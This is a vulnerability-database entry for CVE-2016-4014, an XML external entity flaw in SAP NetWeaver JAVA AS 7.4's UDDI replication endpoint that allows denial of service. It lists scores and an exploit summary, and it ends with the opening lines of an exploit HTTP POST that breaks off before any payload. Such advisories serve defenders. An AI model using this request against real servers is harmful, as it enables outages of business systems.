CVE-2016-4014

Published: 14/04/2016 Updated: 10/12/2018
CVSS v2 Base Score: 9 | Impact Score: 8.5 | Exploitability Score: 10
CVSS v3 Base Score: 8.6 | Impact Score: 4.7 | Exploitability Score: 3.9
VMScore: 801
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:C

Vulnerability Summary

XML external entity (XXE) vulnerability in the UDDI component in SAP NetWeaver JAVA AS 7.4 allows remote malicious users to cause a denial of service (system hang) via a crafted DTD in an XML request to uddi/api/replication, aka SAP Security Note 2254389.

Vulnerable Product

sap netweaver 7.4

Exploits

An attacker can trigger an XML Entity Expansion or XML External Entity Injection. This causes the entire machine to become unresponsive until the process is terminated manually. An attacker can use this flaw to perform a denial-of-service (DoS) attack. SAP NetWeaver AS JAVA version 7.4 is affected ...

Github Repositories

[CVE-2016-4014] SAP Netweaver AS JAVA UDDI Component XML External Entity (XXE)

[CVE-2016-4014] SAP Netweaver JAVA AS UDDI Component XXE

POST /uddi/api/replication HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 340

<?xml version="1.0" encoding=&qu